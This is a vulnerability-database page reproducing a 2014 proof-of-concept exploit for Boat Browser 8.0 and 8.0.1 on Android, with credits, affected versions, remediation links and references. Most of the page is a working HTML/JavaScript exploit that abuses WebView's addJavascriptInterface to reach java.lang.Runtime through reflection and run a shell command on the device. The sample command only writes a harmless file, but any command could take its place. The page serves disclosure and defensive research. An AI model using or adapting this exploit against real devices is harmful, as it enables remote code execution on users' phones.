Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Boat Browser 8.0 and 8.0.1 - Remote Code Execution Vulnerability

🗓️ 17 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 37 Views

Boat Browser 8.0 and 8.0.1 - Remote Code Execution Vulnerability in Android Device

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Boat Browser 8.0 and 8.0.1 - Remote Code Execution Vulnerability
17 Jul 201400:00
zdt
0day.today		Android 4.2 Browser and WebView - addJavascriptInterface Code Execution Exploit
23 Mar 201700:00
zdt
android		JavaScript to Java
21 Dec 201200:00
android
Circl		CVE-2012-6636
21 Dec 201200:00
circl
CVE		CVE-2012-6636
3 Mar 201402:00
cve
Cvelist		CVE-2012-6636
3 Mar 201402:00
cvelist
Exploit DB		Boat Browser 8.0/8.0.1 - Remote Code Execution
16 Jul 201400:00
exploitdb
exploitpack		Boat Browser 8.08.0.1 - Remote Code Execution
16 Jul 201400:00
exploitpack
Japan Vulnerability Notes		JVN#62161191: JavaFX WebEngine does not properly restrict Java method execution
28 Jul 202000:00
jvn
Japan Vulnerability Notes		JavaFX WebEngine does not properly restrict Java method execution
28 Jul 202006:47
jvn
Rows per page

                                                <!--
                                                    .:: Remote code execution vulnerability in Boat Browser ::.
 
                                                     
credit: c0otlass
social contact: https://twitter.com/c0otlass
mail: [email protected]
CVE reserved : 2014-4968
time of discovery:  July 14, 2014
Browser Official site:http://www.boatmob.com/
Browser download link:https://play.google.com/store/apps/details?id=com.boatbrowser.free&hl=en
version Affected : In  8.0 and 8.0.1 tested , Android 3.0 through 4.1.x
Risk rate: High
vulnerability Description impact:
    The WebView class and  use of the WebView.addJavascriptInterface method has vulnerability which cause remote code in html page run in android device
    a related issue to CVE-2012-6636
proof of concept:
//..............................................poc.hmtl............................................
-->
<!DOCTYPE html>
<html>
<head>
<meta charset="UFT-8">
<title>CreatMalTxt POC - WebView</title>
<script>
var obj;
function TestVulnerability()
        {
temp="not";
var myObject = window;
    for (var name in myObject) {                                       
        if (myObject.hasOwnProperty(name)) {                                   
            try
            {              
            temp=myObject[name].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null);                                             
            }
            catch(e)
            {                                                      
            }
            }
    }
                if(temp=="not")
                        {
                            document.getElementById("log").innerHTML="this browser has been patched";                                              
                        }
                    else{
                         document.getElementById("log").innerHTML = "This browser is exploitabale" + "<br>" + " the poc file hase been created in sdcard ...<br>" ;
                         document.getElementById("log").innerHTML +=  "we could see proccess information"+ temp.exec(['/system/bin/sh','-c','echo \"mwr\" > /mnt/sdcard/mwr.txt']);                                                                                 
                        }
        }      
</script>
</head>
<body >
<h3>CreatMalTxt POC</h3>
<input value="Test Vulnerability"  type="button"  onclick="TestVulnerability();" />
<div id="log"></div>
</body>      
</html>
 
<!--
Solution:
https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/
http://www.programering.com/a/MDM3YzMwATc.html
https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614    
 
References:
http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/
https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/
http://50.56.33.56/blog/?p=314
https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/
https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py
-->

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Jul 2014 00:00Current
7.6High risk
Vulners AI Score7.6
EPSS0.76338
boat browserremote code executionvulnerabilityandroidwebviewaddjavascriptinterfacecve-2014-4968mwrexploit
37